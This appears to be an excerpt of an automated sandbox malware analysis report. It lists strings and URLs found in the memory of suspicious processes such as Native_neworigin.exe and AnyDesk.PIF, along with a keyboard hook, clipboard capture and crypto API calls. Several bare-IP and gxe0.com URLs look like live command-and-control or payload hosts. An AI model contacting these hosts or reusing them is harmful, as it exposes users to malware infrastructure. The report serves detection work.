                      Source: alg.exe, 0000001D.00000003.2774103854.0000000000574000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2764898749.0000000000574000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2743764090.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.254.94.185:80/luiqxxselqgi
                      Source: alg.exe, 0000001D.00000003.2636298943.00000000005A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/
                      Source: alg.exe, 0000001D.00000003.2169448202.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45:80/srxp
                      Source: alg.exe, 0000001D.00000003.2476312068.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2453236791.00000000005A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/
                      Source: alg.exe, 0000001D.00000003.2764898749.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2774103854.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2825140838.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/rfcbglebj
                      Source: alg.exe, 0000001D.00000003.2454327094.0000000000574000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2476312068.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160:80/nb0
                      Source: alg.exe, 0000001D.00000003.2076659041.000000000057C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/uahjpntri
                      Source: alg.exe, 0000001D.00000003.2554188081.00000000005A7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2825140838.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/
                      Source: alg.exe, 0000001D.00000003.2774103854.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/ahrycwbcmx
                      Source: alg.exe, 0000001D.00000003.2774103854.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/ahrycwbcmxvps
                      Source: alg.exe, 0000001D.00000003.2774103854.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2825140838.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/d
                      Source: alg.exe, 0000001D.00000003.2054334789.000000000057C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/phrsxg
                      Source: alg.exe, 0000001D.00000003.1976473773.0000000000589000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.1958602560.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/qaejwi
                      Source: alg.exe, 0000001D.00000003.2774103854.0000000000574000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2801483530.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/ahrycwbcmx
                      Source: alg.exe, 0000001D.00000003.2801483530.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/ryyevidfy
                      Source: alg.exe, 0000001D.00000003.2601733139.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2585290760.000000000057A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2454327094.0000000000574000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2476312068.0000000000574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/efnfkaqjisfwrsut
                      Source: alg.exe, 0000001D.00000003.2142232405.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2184386077.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2168394435.000000000057C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/cwpmdhyer
                      Source: Native_neworigin.exe, 0000001B.00000003.1551625098.000000000522A000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000003.1552020145.0000000005247000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/gcjwtno
                      Source: Native_neworigin.exe, 0000001B.00000003.1551625098.000000000522A000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000003.1552020145.0000000005247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/gcjwtnop
                      Source: alg.exe, 0000001D.00000003.1544503132.0000000000583000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.1530654690.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/itufvxod
                      Source: alg.exe, 0000001D.00000003.1500485839.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/obvywkjre#-8
                      Source: alg.exe, 0000001D.00000003.2066404539.000000000057C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ywvbvutri
                      Source: Native_neworigin.exe, 0000001B.00000002.1778079726.000000000522C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/
                      Source: Native_neworigin.exe, 0000001B.00000002.1778079726.000000000522C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/.
                      Source: Native_neworigin.exe, 0000001B.00000002.1778079726.000000000522C000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000063E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/aldxsqumvddjjq
                      Source: Native_neworigin.exe, 0000001B.00000002.1778079726.000000000522C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/aldxsqumvddjjq
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: kn.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: kn.exe, 0000000C.00000002.1297481760.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000C.00000000.1286664343.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000000.1299867443.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000002.1305778842.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                      Source: Native_neworigin.exe, 0000001B.00000002.1722177417.000000000305A000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003218000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1778079726.000000000522C000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
                      Source: Native_neworigin.exe, 0000001B.00000002.1722177417.000000000305A000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003218000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1778079726.000000000522C000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                      Source: Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s82.gocheapweb.com
                      Source: Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: AnyDesk.PIF, AnyDesk.PIF, 0000000F.00000002.1459416504.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020BA2000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311999021.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1543463102.0000000021AA0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1575416317.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1432008197.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1457046440.0000000002C53000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020AD0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311674784.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1544663753.0000000021CA2000.00000004.00001000.00020000.00000000.sdmp, aymtmquJ.pif, 00000019.00000000.1432545418.0000000000416000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.pmail.com
                      Source: Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003218000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1778079726.000000000522C000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1778079726.0000000005282000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000063E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003218000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1778079726.000000000522C000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1778079726.0000000005282000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000063E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: alg.exe, 0000001D.00000003.2794724738.0000000000430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/external-general-entitieshttp://xml.org/sax/features/namespacesXml
                      Source: alg.exe, 0000001D.00000003.2794724738.0000000000430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/lexical-handler/parameter-entitieshttp://xml.org/sax/features/external-p
                      Source: alg.exe, 0000001D.00000003.2794724738.0000000000430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/lexical-handler(Mso::Xml::MxWriter)
                      Source: alg.exe, 0000001D.00000003.2794724738.0000000000430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/lexical-handlerxmlns
                      Source: kn.exeString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
                      Source: kn.exe, 0000000C.00000002.1297481760.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000C.00000000.1286664343.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000000.1299867443.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000002.1305778842.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
                      Source: Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: alg.exe, 0000001D.00000003.2194386050.0000000001490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
                      Source: alg.exe, 0000001D.00000003.2778966373.0000000000420000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com/config/v2/OfficeFA000000
                      Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
                      Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
                      Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
                      Source: AnyDesk.PIF, 0000000F.00000002.1438483669.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/
                      Source: AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020BDD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_Juqmtm
                      Source: AnyDesk.PIF, 0000000F.00000002.1438483669.0000000000776000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyy
                      Source: AnyDesk.PIF, 0000000F.00000002.1438483669.00000000007A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_JuqmtmyadyyG
                      Source: AnyDesk.PIF, 0000000F.00000002.1438483669.000000000072E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_JuqmtmyadyyP
                      Source: AnyDesk.PIF, 0000000F.00000002.1438483669.00000000007A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com:443/yak2/233_Juqmtmyadyy
                      Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
                      Source: kn.exe, 0000000C.00000002.1297481760.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000C.00000000.1286664343.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000000.1299867443.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000002.1305778842.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
                      Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
                      Source: alg.exe, 0000001D.00000003.2794724738.0000000000430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://otelrules.azureedge.netsdxhelper.exeofficec2rclient.exe
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                      Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.10:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49824 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49940 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49953 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, cPKWk.cs .Net Code: I3Mi2zn6x
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Window created: window name: CLIPBRDWNDCLASS
                      Source: alg.exe, 0000001D.00000003.2667144264.0000000001490000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: RegisterRawInputDevices memstr_76e93ac4-5

                      E-Banking Fraud

                      Source: C:\Users\Public\kn.exe Code function: 12_2_00007FF627A9B684 CertCompareCertificateName,#357,#357,CertEnumCertificatesInStore,CertCompareCertificateName,CertComparePublicKeyInfo,memcmp,#357,CertEnumCertificatesInStore,#357,CertFreeCertificateContext,CertAddCertificateContextToStore,GetLastError,12_2_00007FF627A9B684
                      Source: C:\Users\Public\kn.exe Code function: 12_2_00007FF627B1A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,12_2_00007FF627B1A740
                      Source: C:\Users\Public\kn.exe Code function: 12_2_00007FF627AA25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,12_2_00007FF627AA25E8
                      Source: C:\Users\Public\kn.exe Code function: 12_2_00007FF627ADE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,12_2_00007FF627ADE1F8
                      Source: C:\Users\Public\kn.exe Code function: 12_2_00007FF627AD0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,12_2_00007FF627AD0F58
                      Source: C:\Users\Public\kn.exe Code function: 12_2_00007FF627AE0EF4 NCryptImportKey,#205,#359,#359,#357,12_2_00007FF627AE0EF4
                      Source: C:\Users\Public\kn.exe Code function: 12_2_00007FF627B16EA8 NCryptImportKey,#360,12_2_00007FF627B16EA8
                      Source: C:\Users\Public\kn.exe Code function: 12_2_00007FF627ACEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,12_2_00007FF627ACEA7C
                      Source: C:\Users\Public\kn.exe Code function: 12_2_00007FF627AA29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,12_2_00007FF627AA29A0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,12_2_00007FF627AD184C
